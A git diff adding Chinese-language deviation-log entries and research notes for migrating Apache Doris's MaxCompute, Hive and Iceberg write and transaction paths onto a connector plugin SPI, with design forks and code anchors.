`enable_strict_consistency_dml=`**`true`**(`SessionVariable.java:1566`)下——① 两路均 `required≠ANY → prune=false`(**同果**);② `RequestPropertyDeriver` 下推 `getRequirePhysicalProperties()` = hash+local-sort(**enforce**,与 legacy MC 同)。仅 non-strict(用户显式关)时分歧:① 通用分支**少剪**(更保守 = missed optimization,无正确性损);② local-sort 被丢——但 **legacy MC 在 non-strict 下亦丢**(`visitPhysicalMaxComputeTableSink` 同样下推 ANY)→ parity,非本 fix 引入。clean-room review Phase B 把 ① 多数 refute 为 non-regression。 +- **影响范围**:仅 `enable_strict_consistency_dml=false` 的 MaxCompute 动态分区写;default 不触及。① 纯性能(少剪 shuffle-key);② 与 legacy 同行为。 +- **关联**:[D-029]、[review-rounds](./reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md)、[复审 §A.NG-2/NG-4](./reviews/P4-maxcompute-full-rereview-2026-06-07.md) +- **后续动作**: + - [ ] 如需 non-strict 下完全 parity:给 `ShuffleKeyPruner` 通用 connector 分支补 `enableStrictConsistencyDml` 短路(影响 jdbc/es 共享分支,超本 fix scope) + +### DV-012 — P4-T04:`partition_columns` 取 ODPS 表列(源不同、值同) + +- **发现日期**:2026-06-06 +- **发现 session / agent**:P4 Batch B session(P4-T04 写计划实现,核读 legacy `MaxComputeTableSink.bindDataSink`) +- **当前状态**:🟢 已落地(P4-T04,值等价) +- **原计划位置**:[P4-T04 设计](./tasks/designs/P4-T04-write-plan-design.md)(港 legacy `MaxComputeTableSink` 静态字段) +- **偏差描述**:legacy `MaxComputeTableSink.bindDataSink` 填 `TMaxComputeTableSink.partition_columns`(field 14) 取 `targetTable.getPartitionColumns()`(fe-core Doris `Column` 名)。连接器 import-gate 禁 fe-core `catalog.Column`,且 planWrite 持的是 `MaxComputeTableHandle`(携 odps-sdk `Table`)非 fe-core 表。 +- **新方案**:连接器 `MaxComputeWritePlanProvider.planWrite` 取 `mcHandle.getOdpsTable().getSchema().getPartitionColumns()`(odps-sdk `com.aliyun.odps.Column` 名)。**源不同(ODPS schema vs fe-core Column)、值同(分区列名字符串)**——BE 经 field 14 收到相同分区列名 list。同源亦用于静态分区串的列序(`MCTransaction.beginInsert` 用 fe-core 列序,连接器用 ODPS 列序,序同)。 +- **影响范围**:连接器 `MaxComputeWritePlanProvider`(dormant,gate 关,零 live)。行为等价:BE 收到的 `partition_columns` 内容不变。 +- **关联**:P4-T04、[P4-T04 设计](./tasks/designs/P4-T04-write-plan-design.md)、[D-025] + +--- + +### DV-011 — P4-T03:连接器事务 block 上限 + 异常类型(import-gate 禁 fe-core common) + +- **发现日期**:2026-06-06 +- **发现 session / agent**:P4 Batch B session(P4-T03 写前核实 import-gate 边界:`org.apache.doris.common.{Config,UserException}` 均在禁列) +- **当前状态**:🟢 已修正(P4-T03 硬编 → GC1 经 session-property 透传恢复 fe.conf 可调性,`95575a4954d`) +- **原计划位置**:[P4-T03 设计](./tasks/designs/P4-T03-write-txn-design.md)(港 legacy `MCTransaction` block 分配 + commit) +- **偏差描述**:legacy `MCTransaction.allocateBlockIdRange` 用 fe-core `Config.max_compute_write_max_block_count`(默认 20000,fe.conf 可调)作上限、并 `throws UserException`。连接器 import-gate 禁 `org.apache.doris.common.*`(含 `Config`/`UserException`),二者均不可 import。 +- **新方案**:① 上限改连接器常量 `MaxComputeConnectorTransaction.MAX_BLOCK_COUNT = 20000L`(镜像 legacy 默认值,**丢 fe.conf 可调性**;Rule 2 不投机,如需再经 `MCConnectorProperties` 暴露)。② 校验失败抛 `DorisConnectorException`(unchecked;SPI `ConnectorTransaction.allocateWriteBlockRange` 面无 checked throws,W4 `PluginDrivenTransaction` 适配)。 +- **影响范围**:连接器 `MaxComputeConnectorTransaction`(dormant,gate 关,零 live)。行为:block 上限值不变(20000),仅来源 Config→常量;异常类型 UserException→DorisConnectorException(语义等价的写失败)。 +- **关联**:P4-T03、[P4-T03 设计](./tasks/designs/P4-T03-write-txn-design.md)、[D-024] +- **后续动作**: + - [x] 已恢复 fe.conf 可调(GC1 FIX-BLOCKID-CAP-CONFIG,`95575a4954d`):经 **session-property 透传**——fe-core `ConnectorSessionBuilder.extractSessionProperties` 注入 `Config.max_compute_write_max_block_count`(镜像既有 `lower_case_table_names`),连接器 `MaxComputeConnectorMetadata.resolveMaxBlockCount` 读 `ConnectorSession.getSessionProperties()` 透传 ctor。**非**原拟 `MCConnectorProperties`(那是 catalog-scoped、错 scope);本机制读 fe-core 全局 Config = true legacy parity。 + +### DV-010 — P4-T01:共享 fe-core ConnectorColumnConverter 丢 CHAR/VARCHAR 长度,特判修复(用户签字) + +- **发现日期**:2026-06-06 +- **发现 session / agent**:P4 Batch A session(P4-T01 启动前 code-grounded 核读 `ConnectorColumnConverter.toConnectorType` + `ScalarType`:CHAR/VARCHAR 长度存 `len`、`getScalarPrecision()` 返 `precision`=0;既有 `ConnectorColumnConverterTest` 无 CHAR/VARCHAR 断言) +- **当前状态**:🟢 已修正(P4-T01;fe-core `ConnectorColumnConverter` 特判 + 回归测 `testCharVarcharLengthPreserved`,Tests run 9/0F0E) +- **原计划位置**:P4-T01 原框定「连接器-only、gate 关」;`ConnectorColumnConverter.toConnectorType`(P0-T15 期建)ScalarType 分支统一用 `getScalarPrecision()`/`getScalarScale()` +- **偏差描述**:连接器 `createTable` 消费的 `ConnectorCreateTableRequest` 列类型经 `ConnectorColumnConverter.toConnectorType(Type)` 产生;其 ScalarType 分支对 CHAR/VARCHAR 用 `getScalarPrecision()`(=`precision` 字段,CHAR/VARCHAR 默认 0),而长度实存 `len`(`getLength()`)→ 请求里 CHAR(n)/VARCHAR(n) **丢长度**(legacy `dorisScalarTypeToMcType` 用 `getLength()` 保留)。这是 P0 转换器的**逆一致性 bug**(其逆向 `convertScalarType` + 连接器 `MCTypeMapping` 约定「CHAR/VARCHAR 长度在 precision 字段」),是 CHAR/VARCHAR DDL 经 SPI 真正达 parity 的唯一路径。 +- **新方案**(用户 AskUserQuestion 签字「修 fe-core 转换器」):`toConnectorType` 特判 CHAR/VARCHAR,把 `getLength()` 写入 ConnectorType precision 字段(与逆向约定一致);其余类型不变;加回归测 `ConnectorColumnConverterTest#testCharVarcharLengthPreserved`。 +- **替代方案**:连接器侧对 CHAR/VARCHAR 缺长度 fail-loud + 记 OQ 推迟(保 Batch A 连接器-only 边界,但 CHAR/VARCHAR DDL 暂不可用)——用户否决。 +- **影响范围**: + - 代码:fe-core `ConnectorColumnConverter.toConnectorType`(+ import `PrimitiveType`)+ test。**触碰共享 P0 代码**:对 live 的 jdbc/es CREATE TABLE CHAR/VARCHAR 行为变更(「丢长度」→「保留长度」,严格更正确,低风险)。 + - 文档:本条 + [tasks/P4](./tasks/P4-maxcompute-migration.md) + [PROGRESS](./PROGRESS.md)(§四/§六计数)。 + - 计划:P4-T01 范围从「连接器-only」微扩至含 1 处 fe-core 转换器修复。 +- **关联**:P4-T01、P0-T15(converter)、[D-023] +- **后续动作**: + - [x] 修 `toConnectorType` + 回归测(P4-T01) + - [ ] Batch E:连接器 DDL parity 测覆盖 CHAR/VARCHAR 端到端 + +### DV-009 — W5 写 sink 收口位置与 RFC/handoff 措辞不符:plugin-driven 写已有专路,改为 layer planWrite + +- **发现日期**:2026-06-06 +- **发现 session / agent**:W-phase 实现 session(W5 启动前 2 路 Explore code-grounded recon:sink 入参 + nereids 写 sink 接线;主线 firsthand 核读 `PhysicalPlanTranslator.visitPhysicalConnectorTableSink` / `planner/PluginDrivenTableSink`) +- **当前状态**:🟢 已修正(W5 commit `9ebe5e27fa4`;用户 AskUserQuestion 签字「Corrected W5 (layer planWrite)」) +- **原计划位置**:[写 RFC §5.5 / §12 W5](./tasks/designs/connector-write-spi-rfc.md)、[HANDOFF W5 锚点](./HANDOFF.md)——原措辞:「新建 fe-core `PluginDrivenTableSink` + `PhysicalPlanTranslator` 各 `visitPhysicalXxxTableSink`(hive/iceberg/mc)→ `planWrite()`,保 PhysicalXxxSink fallback」。 +- **偏差描述**:RFC/handoff 写于不知既有路径之时。实测(recon + firsthand 核读): + 1. `PluginDrivenTableSink` **已存在**(`planner/PluginDrivenTableSink.java`,P0/P1 JDBC 期建),非新建。 + 2. plugin-driven 写 INSERT **不**走 `visitPhysicalHive/Iceberg/MaxComputeTableSink`(那 3 个服务 legacy 非 plugin-driven 表);走专路 `UnboundConnectorTableSink → LogicalConnectorTableSink → PhysicalConnectorTableSink → visitPhysicalConnectorTableSink`(`PhysicalPlanTranslator:644`),已据 `ConnectorWriteConfig`(config-bag)建 `PluginDrivenTableSink`。mc/hive/iceberg 迁 plugin-driven 后走此专路 → 在那 3 个 concrete 方法加 planWrite 路由是**死代码**。 + 3. 两写-sink 模型并存:既有 **config-bag**(连接器返 `ConnectorWriteConfig` 属性包,fe-core 建 `THiveTableSink`/`TJdbcTableSink`;表达不了 mc/iceberg)⊥ 新 **opaque-sink**(W1 `ConnectorWritePlanProvider.planWrite()` 连接器自建 `TDataSink`,RFC §5.5 E 决策,可泛化)。RFC 未察 config-bag 已存在,故未调和二者。 +- **新方案**(用户签字):在既有 `visitPhysicalConnectorTableSink` + `PluginDrivenTableSink.bindDataSink` 上 **layer** `planWrite()` 为优先路径(`connector.getWritePlanProvider() != null` 时),config-bag 为 fallback。**不动** 3 个 concrete visit 方法。零行为变更(无连接器 override `getWritePlanProvider`,jdbc 仍走 config-bag)。`ConnectorWriteHandle`/`ConnectorSinkPlan`(W1)形状经使用确认充分,无需改。 +- **缩界(R12 不静默)**:overwrite / 静态分区 / writePath 等 connector-specific write context 的 handle 填充留 P4 adopter(base `InsertCommandContext` 为空 marker,无通用 overwrite;强行 instanceof 子类会再耦合 fe-core)。W5 仅建 seam(空 context)。 + +--- + ### DV-008 — P3-T07 parity 暴露两处 SPI↔legacy 偏差:列名 casing 当场修;Hudi meta-field 纳入推迟批 E - **发现日期**:2026-06-05 diff --git a/plan-doc/research/connector-write-spi-recon.md b/plan-doc/research/connector-write-spi-recon.md new file mode 100644 index 00000000000000..2c7a39c5fe3980 --- /dev/null +++ b/plan-doc/research/connector-write-spi-recon.md @@ -0,0 +1,144 @@ +# 连接器写/事务 SPI — code-grounded research note(3 写者 + paimon 前瞻) + +> 产出 2026-06-06,P4 启动·scope=C(写-SPI RFC 先行)。用户指令:**先完整调研 maxcompute / hive / iceberg 三个现存写者的写入能力,再做完整设计;paimon 当前不写但后续会写,需前瞻纳入**。 +> 方法:11 路只读 Explore code-grounded 调研(6 maxcompute 面 + 写框架 + 现存 SPI + paimon + hive 深挖 + iceberg 深挖)+ 主线 firsthand 核读 leak 锚点。 +> 用途:research-design-workflow 的 research note;写-SPI RFC(设计文档)的事实底座与 fork 清单。**本文不是设计定稿**——设计待用户在 §8 forks 给方向后再写。 + +--- + +## 1. 三写者写入能力一览(write surface) + +| 能力 | maxcompute | hive(HMSTransaction)| iceberg(IcebergTransaction)| +|---|---|---|---| +| INSERT(append)| ✅ | ✅ `HiveInsertExecutor:46` | ✅ `IcebergTransaction.beginInsert:129` | +| INSERT OVERWRITE | ✅ | ✅(partition append/overwrite,`HMSTransaction:247-312`)| ✅ 动态/静态(`commitReplaceTxn:838`/`commitStaticPartitionOverwrite:878`)| +| 行级 DELETE | ❌ | ❌(仅 `HiveTransaction` 读侧 ACID 校验,非写)| ✅ position delete(`beginDelete:268`,`RowDelta`)| +| UPDATE/MERGE | ❌ | ❌ | ✅ merge-on-read v2+(`beginMerge:295`)| +| PROCEDURES | ❌ | ❌ | ✅ rewrite_data_files / expire_snapshots(`ExecuteActionFactory:99`,**非 SPI**,自定义 action)| +| schema evolution on write | ❌ | ❌ | ✅(`SchemaParser.toJson` in `IcebergTableSink:137`)| + +> 关键:**hive 当前不做行级 ACID 写**(R-002 主要是读侧一致性 + 外部 compaction 风险);**iceberg 是三者中写面最宽**(insert+delete+merge+procedures)。设计若只对 maxcompute 会漏掉 iceberg 的 delete/merge/procedure 形态。 + +--- + +## 2. 公共写生命周期(三者同骨架) + +``` +1. beginTransaction → transactionManager.begin() → 连接器 Transaction(txnId 记入 GlobalExternalTransactionInfoMgr) +2. begin{Insert/Delete/Merge} → 连接器专有 begin(load table、建 session/manifest/staging) +3. FE 建连接器专有 thrift sink(T{MaxCompute/Hive/Iceberg}TableSink)于 *TableSink.bindDataSink() +4. BE 执行写 → 发连接器专有 commit 载荷(TMCCommitData / THivePartitionUpdate / TIcebergCommitData) + └─ maxcompute 额外:BE↔FE allocateBlockIdRange RPC(写期间) +5. FE 收 commit 载荷 → 连接器.updateXxxCommitData() ← ★ LEAK:Coordinator/LoadProcessor 里 concrete cast +6. finish{Insert/Delete/Merge/Rewrite} → 连接器把 commit 数据落到自己元数据(ODPS session.commit / HMS action queue+FS rename / iceberg manifest txn) +7. transactionManager.commit(txnId) → 连接器.commit() / rollback() +8. getUpdateCnt() → 结果行数 +``` + +第 1/2/6/7/8 步**已是接口化形状**(`Transaction`/`TransactionManager`/begin/finish/commit);**真正的 leak 在第 4→5 步**(typed BE commit 载荷经 concrete cast 进连接器)+ maxcompute 第 4 步的 block-id RPC。 + +--- + +## 3. 各写者模型(精炼) + +### maxcompute(有状态 session + FE 分配 block-id) +- `MCTransaction`:ODPS Storage API `TableBatchWriteSession`;`beginInsert`(建 session+writeSessionId) → BE 写、`allocateBlockIdRange`(BE↔FE RPC) → BE 回 `WriterCommitMessage`(序列化二进制) 经 `updateMCCommitData` → `finishInsert`(反序列化 + `session.commit`)。 +- 专有数据:writeSessionId、block-id 范围、`WriterCommitMessage`(opaque)。 +- sink:`TMaxComputeTableSink`(endpoint/project/credentials/partition + 运行期 write_session_id/txn_id/block_ids)。 + +### hive(无状态文件 IO + HMS 批元数据;staging+rename) +- `HMSTransaction`:`beginInsertTable`(ctx:queryId/overwrite/writePath) → BE 写 staging、发 `THivePartitionUpdate`(name/mode/file_names/row_count/file_size/S3-MPU) 经 `updateHivePartitionUpdates` → `finishInsertTable`(转 action queue:add/alter partition) → `commit`(FS rename + HMS API + stats + S3 MPU complete)。 +- **无 block-id、无 write-id**;分区级原子性靠 action queue + FS staging+rename。 +- R-002:外部 Hive compaction 产生 Doris 不追踪的 write-id → 读一致性风险(设计可不解,登记)。 +- sink:`THiveTableSink`(db/table/columns/partitions/format/location/hadoop_config/overwrite)。 + +### iceberg(无状态 manifest/snapshot;写面最宽 + procedures) +- `IcebergTransaction`:begin{Insert/Delete/Merge/Rewrite} → BE 写数据/删除文件、回 `TIcebergCommitData`(file_path/row_count/partition/column_stats/delete-file 信息) 经 `updateIcebergCommitData` → finish{Insert→Append/Replace/Overwrite;Delete/Merge→RowDelta;Rewrite→RewriteFiles} → `transaction.commit()`。 +- DELETE:position delete files / deletion vectors(v3);conflict detection filter。 +- PROCEDURES:`ALTER TABLE EXECUTE rewrite_data_files(...)` 经 `ExecuteActionCommand`→`ExecuteActionFactory`→`IcebergRewriteDataFilesAction`→`RewriteDataFileExecutor`(cast `IcebergTransaction`,`beginRewrite/updateRewriteFiles/finishRewrite`)。**当前是硬编码 action,非 `ConnectorProcedureOps`**。 +- sink:`TIcebergTableSink`(schema_json/partition_specs/sort/format/write_type INSERT|REWRITE)+ `TIcebergDeleteSink`(delete_type POSITION_DELETES|DELETION_VECTOR/format_version)。 + +--- + +## 4. 对比矩阵(COMMON ⊥ DIVERGENT)= 设计核心输入 + +| 维度 | COMMON(可泛化为 SPI)| DIVERGENT(连接器专有,需 opaque/seam)| +|---|---|---| +| 事务壳 | begin/commit/rollback + txnId 注册(三者同 `Transaction`/`AbstractExternalTransactionManager`)| 无 | +| 操作粒度 | begin/finish per-op(SPI 已有 insert/delete/merge)| 哪些 op 支持:mc/hive=insert;iceberg=+delete/merge/rewrite | +| BE→FE commit 载荷 | 「BE 写完回一批 commit 数据给连接器」这一动作 | **载荷类型**:opaque binary(mc) / typed partition-update(hive) / typed file-metadata(iceberg) | +| 落元数据 | finish 钩子 | 机制:ODPS session.commit / HMS action queue+rename / iceberg manifest | +| 写期 BE↔FE 交互 | (多数无)| **block-id 分配**:maxcompute-only RPC | +| thrift sink | 「连接器产 sink desc 给 BE」 | 每连接器自有 T*TableSink(BE 已认,不变)| +| procedures | — | iceberg-only(rewrite 等)| +| MVCC 读快照 | SPI 已有 `beginQuerySnapshot/getSnapshotAt/ById`| iceberg/paimon 用;mc/hive 不用 | + +**结论**:公共骨架可泛化;分歧集中在 **(i) commit 载荷类型、(ii) maxcompute block-id、(iii) iceberg procedures/多 op**。设计 = 泛化骨架 + 为这 3 处留 seam。 + +--- + +## 5. 现存 SPI 写面(P0,`ConnectorWriteOps`)— 形状已在,仅 JDBC 实现 + +- `supportsInsert/Delete/Merge()`→false;`getWriteConfig→ConnectorWriteConfig`(throws); +- `beginInsert→ConnectorInsertHandle` / `finishInsert(session,handle,Collection fragments)` / `abortInsert`(JDBC override insert); +- `beginDelete/finishDelete/abortDelete`、`beginMerge/finishMerge/abortMerge`(throws/no-op); +- `beginTransaction(session)→ConnectorTransaction`;`ConnectorTransaction extends ConnectorTransactionHandle, Closeable`:`getTransactionId/commit/rollback/close`; +- `ConnectorInsert/Delete/MergeHandle`(opaque);`ConnectorWriteType{FILE_WRITE,JDBC_WRITE,REMOTE_OLAP_WRITE,CUSTOM}`; +- `ConnectorSession.getCurrentTransaction→Optional`;`ConnectorTableOps.createTable×2/dropTable`; +- MVCC:`ConnectorMvccSnapshot` + `beginQuerySnapshot/getSnapshotAt/getSnapshotById`(paimon 读用)。 +- **关键洞察**:Trino 式 begin/finish + opaque handle + `Collection` fragments **已经是现成形状**;`finishInsert` 收 `Collection` 正好可承接「BE commit 载荷序列化为 bytes」。`PluginDrivenInsertExecutor` + `PluginDrivenTransactionManager`(P0-T11 加 `begin(ConnectorTransaction)`) 脚手架已存在。 + +--- + +## 6. 必须消除的 leak(generic 层 concrete cast) + +| 站点 | cast | 替换为 | +|---|---|---| +| `Coordinator:2531/2536/2539` | `((HMS/Iceberg/MC)Transaction) …).updateXxxCommitData(typed)` | 多态 SPI:把 BE commit 载荷交连接器(§8-B)| +| `LoadProcessor:232-240` | 同上三 cast | 同上 | +| `FrontendServiceImpl:3697-3702` | `((MCTransaction)txn).allocateBlockIdRange(...)` | 连接器写期 RPC seam(§8-C)| +| `RewriteDataFileExecutor:61` | `((IcebergTransaction)…).beginRewrite/finishRewrite` | iceberg procedure,**本 RFC 不解**(§8-D defer)| + +--- + +## 7. paimon 前瞻(今读、后写) + +- 今:**只读 + MVCC**(`pom.xml:40`「DML 暂留 fe-core」;`PaimonConnectorMetadata` 不 impl `ConnectorWriteOps`;无 Paimon*Sink/Transaction)。MVCC 读已用 SPI `beginQuerySnapshot` 等。 +- 后(P5)写:预计 Paimon `BatchWriteBuilder`/`TableWrite`/`TableCommit`,commit 载荷 paimon-native。落进**与 iceberg 同形**(manifest/snapshot 式、无 block-id、有 MVCC)。 +- 设计约束:写 SPI 必须**允许 paimon 后续以 opaque handle + bytes-fragment + ConnectorTransaction 接入,零 SPI 改动**(验证:W4 verdict 现有形状足够,paimon 写时只需 impl `ConnectorWriteOps` + 仿 `PluginDrivenInsertExecutor`)。 + +--- + +## 8. 关键设计 FORKS(待用户给方向,再写 RFC) + +> A/E 给出推荐默认(不同意再说);**B/C/D 是真分歧,请签字**。 + +**A.〔事务模型统一〕**(推荐默认)连接器 `ConnectorTransaction` 成单一事实源;fe-core `MCTransaction/HMSTransaction/IcebergTransaction` 逻辑**迁入各自连接器模块**(在 P4/P6/P7 执行期搬),generic 层经 `PluginDrivenTransactionManager` 桥接,只调多态 SPI。← 与已迁连接器一致;确认是否反对。 + +**B.〔BE→FE commit 载荷如何泛化〕**(真分歧) +- **B1 opaque bytes(推荐)**:BE commit 载荷序列化为 `byte[]`,经 `ConnectorTransaction`/`finishInsert(Collection)` 交连接器自行反序列化其 thrift。最泛化、零 BE 改动、fe-core 不见 typed、契合现有 SPI。 +- **B2 通用 typed envelope**:定义中立 `ConnectorCommitData`(files/rows/partition/deletes)三者映射。结构化但有「最小公约数」丢信息风险(iceberg delete-file/stats、hive S3-MPU、mc block 难统一)。 +- **B3 保留 thrift union 经 SPI 路由**:generic 方法收 thrift union,连接器认自己的。保 BE 契约但 thrift 漏进 SPI。 + +**C.〔maxcompute block-id 分配(唯一写期 BE↔FE op)〕**(真分歧) +- **C1 窄 seam(推荐)**:加一个通用「连接器写期 BE→FE 回调」hook(`FrontendServiceImpl` 据 txn 查连接器 write-callback 委派),**仅 maxcompute 实现**,他者不需。消 instanceof 又不过度泛化。 +- **C2 完全泛化**:SPI 加 `allocateWriteRange` 等一等公民方法(过度泛化一个 mc-only 需求)。 +- **C3 暂留特例**:block-id 仍 maxcompute 特判(最小改动,但留一处 instanceof)。 + +**D.〔RFC scope〕**(真分歧,建议) +- **In**:INSERT/DELETE/MERGE 的写/事务 SPI——begin/finish + `ConnectorTransaction` 生命周期 + commit 载荷回调(B) + block-id seam(C) + 写-sink-provider(E) + `PluginDrivenTransactionManager` 桥。以 mc(insert)/hive(insert)/iceberg(insert+delete+merge) 为锚。 +- **Defer(不预排除)**:iceberg PROCEDURES(rewrite 等,归 `ConnectorProcedureOps` E2 + P6);hive 行级 ACID(今未实现);**各连接器代码搬迁**本身(在 P4/P6/P7 执行期做,本 RFC 只定它们要对的 SPI)。 + +**E.〔写 sink 构建位置〕**(推荐默认)连接器模块出**写-plan-provider**(仿 `ConnectorScanPlanProvider`)产 `T*TableSink`;BE 不变;`*TableSink.bindDataSink()` 逻辑搬入连接器。← 仿 scan 先例;确认是否反对。 + +--- + +## 9. 给设计的取向(我的建议汇总) + +A=统一(连接器事务为源);**B=B1 opaque bytes**;**C=C1 窄 callback seam**;**D=DML 三 op in、procedures/搬迁 defer**;E=写-plan-provider 仿 scan。 +→ 净效果:generic 写编排(Coordinator/LoadProcessor/FrontendServiceImpl/BaseExternalTableInsertExecutor)全多态化、零 `instanceof *Transaction`;连接器以 `ConnectorWriteOps`+`ConnectorTransaction`+opaque handle/bytes 接入;BE 契约与各 T*Sink 不变;paimon 后续零-SPI-改动接入。 + +## 10. 开放问题(写 RFC 前需澄清) +1. B1 下,BE commit 载荷的 bytes 是「原 thrift 序列化」还是连接器自定义?(倾向原 thrift bytes,连接器 TDeserialize)——影响 BE↔FE 契约描述,需在 RFC 钉死。 +2. iceberg delete/merge 的 `ConnectorDeleteHandle/MergeHandle` 是否本 RFC 就定义全,还是 insert 先行、delete/merge 留 P6 细化?(倾向 SPI 形状本 RFC 定全,P6 落实现)。 +3. 事务跨「多语句」隔离/只读传播是否纳入(今三者皆单语句 per-INSERT,倾向不纳入)。 diff --git a/plan-doc/research/p4-maxcompute-migration-recon.md b/plan-doc/research/p4-maxcompute-migration-recon.md new file mode 100644 index 00000000000000..2f59af102b5799 --- /dev/null +++ b/plan-doc/research/p4-maxcompute-migration-recon.md @@ -0,0 +1,139 @@ +# P4 maxcompute 迁移 — code-grounded recon + +> 产出于 P4 启动(2026-06-06)。方法:5 路只读 Explore subagent code-grounded 调研 + 主线 firsthand 核读 load-bearing 锚点。 +> 用途:research-design-workflow 的 research note;scope fork 的事实底座。引用此文写 `tasks/P4` 设计备忘。 + +--- + +## 0. 头条结论(与 master plan §3.5 假设的偏差) + +**maxcompute 会写(live write/transaction/DDL 路径,且在热区)——它不是 trino-connector(P2)。** + +- master plan §3.5 把 P4 当成「搬类 + 翻闸 + 删旧」的直线迁移,但 recon 揭示真正的工作与风险都在**写路径**。 +- **模型本身是 clean standalone**(自有 `max_compute` catalog type + 自有 `CatalogFactory` case,**无** hudi 那种寄生/`tableFormatType` 区分符陷阱)→ 翻闸机制本身干净。 +- 但**一旦翻闸**(`max_compute` 进 `SPI_READY_TYPES`),catalog 变 `PluginDrivenExternalCatalog`、表变 `PluginDrivenExternalTable`,则写路径里 15 处 `instanceof MaxComputeExternal*` **全部失配**、INSERT/DDL 断 → **不先把写路径走 SPI 就不能翻闸**。 +- 写路径所需 SPI 当前**不存在**:P0 给了 E4(`ConnectorTransaction`/`ConnectorWriteOps.beginTransaction` default-throw),但 fe-core 写编排调的是 maxcompute 专有方法(`updateMCCommitData`、`allocateBlockIdRange`、`beginInsert/finishInsert`),SPI 未抽象。 + +→ **P4 是一个 scope fork(见 §9),需用户签字**,与 P3 的 D-019 同性质。 + +--- + +## 1. 连接器模块现状(`fe-connector-maxcompute`)= 只读骨架 + +13 文件 / ~2145 LOC。读路径基本可用,写/DDL/分区**全缺**。 + +| SPI 面 | 状态 | 锚点 / 备注 | +|---|---|---| +| Provider getType("max_compute")/create | ✅ | `MaxComputeConnectorProvider:32/37` | +| Connector getMetadata/getScanPlanProvider/testConnection/close | ✅ | `MaxComputeDorisConnector:110/117/123/165` | +| Metadata listDatabaseNames/databaseExists/listTableNames/getTableHandle/getTableSchema/getColumnHandles | ✅ | `MaxComputeConnectorMetadata`(委托 `McStructureHelper`)| +| ScanPlanProvider.planScan(双 overload)| ✅ | `MaxComputeScanPlanProvider:166/173`;谓词下推在 planScan 内(`MaxComputePredicateConverter` 264 LOC),**非** applyFilter hook | +| **createTable/dropTable/createDatabase/dropDatabase** | ❌ default-throw | DDL 全缺(legacy `MaxComputeMetadataOps` 565 LOC 有)| +| **listPartitions/listPartitionNames/listPartitionValues** | ❌ 返空 | 翻闸后 SHOW PARTITIONS / TVF 会断(legacy 走 `getOdpsTable().getPartitions()`)| +| **WriteOps / Transaction(E4)** | ❌ 全缺 | 主线 grep 实证连接器零写/事务实现 | +| applyFilter/applyProjection(hook)| ❌ 返空 | 下推改在 planScan,非缺陷 | +| 单一 stub | — | `MaxComputeScanPlanProvider:370` `checkOnlyPartitionEquality()` 恒 false(保守关 limit-opt,非 bug)| + +META-INF/services 已注册。 + +--- + +## 2. legacy fe-core(`datasource/maxcompute/`)= 10 文件 / ~2978 LOC,全 MOVE + +| 文件 | LOC | 角色 | 处置 | +|---|---|---|---| +| MaxComputeExternalCatalog | 458 | catalog;ODPS client、partition/table listing | MOVE | +| MaxComputeExternalDatabase | 47 | db wrapper | MOVE | +| MaxComputeExternalTable | 336 | table;schema init、类型映射、分区列 | MOVE(读写共用——见 §4)| +| **MCTransaction** | 236 | **ODPS Storage API 写 session:beginInsert/finishInsert/commit** | MOVE(写路径核心)| +| MaxComputeExternalMetaCache | 115 | schema/partition 缓存 | MOVE | +| MaxComputeSchemaCacheValue | 67 | 缓存值 | MOVE | +| **MaxComputeMetadataOps** | 565 | **DDL:CREATE/DROP TABLE/DB** | MOVE | +| McStructureHelper | 298 | db/table/partition 发现(接口+2 impl)| **DEDUP**(见 §6)| +| source/MaxComputeScanNode | 809 | 谓词下推、split 生成 | MOVE | +| source/MaxComputeSplit | 47 | split holder | MOVE | + +--- + +## 3. 反向引用 = ~36 处(21 mechanical / 15 live-logic)——doc 旧称「12」失真 + +> P2 trino 仅 ~2 处全 mechanical;maxcompute 因深度耦合写/事务/分区,量级与性质都更重。 + +**MECHANICAL(21,可折进 PluginDriven 分支 / SPI 注册)**:`CatalogFactory:147` 工厂、`ExternalCatalog:939` db 工厂、`GsonUtils` 3 注册、`UnboundTableSinkCreator` 3 路由、`BindRelation:540`/`Alter:617`/`CreateTableInfo:390/912` case、`ShowPartitionsCommand:202`/`PartitionsTableValuedFunction:173`/`PartitionValuesTableValuedFunction:115` allow-list、`ExternalMetaCacheRouteResolver:75`、`ExternalMetaCacheMgr:183/310`、`TableIf` 枚举、`InitCatalogLog:41`、`DatasourcePrintableMap` 等。 + +**LIVE-LOGIC(15,需 SPI 扩展或保留专有 handler)——集中在写路径**: + +| 区 | 站点 | 性质 | +|---|---|---| +| 事务(热)| `Coordinator:2539` updateMCCommitData / `FrontendServiceImpl:3697-3702` allocateBlockIdRange(RPC) / `LoadProcessor:240` updateMCCommitData | **查询/RPC 热区**,cast `MCTransaction` 调专有方法 | +| 事务 | `MCTransactionManager:27`、`MCInsertExecutor:65` beginInsert | 写编排 | +| sink | `BindSink:1084`、`PhysicalPlanTranslator:596` 建 `MaxComputeTableSink`、`MaxComputeTableSink:67` 读专有 config | 写计划 | +| DDL/命令 | `InsertIntoTableCommand:563`、`InsertOverwriteTableCommand:320` | 命令路由 | +| 读内省 | `ShowPartitionsCommand:287/415` handleShowMaxComputeTablePartitions、`PartitionsTableValuedFunction:200` getOdpsTable().getPartitions()、`MetadataGenerator:1310` dealMaxComputeCatalog、`PhysicalPlanTranslator:777` 建 MaxComputeScanNode | 读侧专有 | + +> 主线已 firsthand 核读确认:`FrontendServiceImpl:3697-3702`、`Coordinator:2539`、`LoadProcessor:240` 确为 live `MCTransaction` cast。 + +--- + +## 4. 写路径 = 真正的 keystone(为何不能简单 hybrid 也不能简单翻闸) + +- `MaxComputeExternalTable` **读写共用**:scan(读)与 sink/insert(写)都引用它。 +- 插件模型下 fe-core **无法 import** 连接器内的类(classloader 隔离)。所以 legacy `MaxComputeExternalTable` 一旦迁入插件,fe-core 写路径(`MaxComputeTableSink`/`MCInsertExecutor`/`Coordinator`/`FrontendServiceImpl`)就**不能再引用它** → 必须先把写编排经 SPI 重新表达。 +- 但**只要 gate 关**(`max_compute` 不在 `SPI_READY_TYPES`),catalog 仍是 legacy、连接器模块 dormant、legacy 写路径原封不动 → **hybrid 可行**(硬化 dormant 读连接器 + 测试,不翻闸、不碰 legacy 写)。这正是 P3 批 A–D 的形态。 +- 写 SPI 抽象(`updateCommitData`/`allocateBlockIdRange`/`begin/finishInsert`/commit)当前**不存在**,是 full 迁移的前置设计;**P5 paimon 同样会写**(`PaimonMvccSnapshot` + 写路径),该 SPI 可 P4/P5 共用。 + +--- + +## 5. 翻闸 / gson / 枚举编辑点(已 pin,镜像 trino/es/jdbc) + +1. `CatalogFactory:52` `SPI_READY_TYPES` 加 `"max_compute"`;删 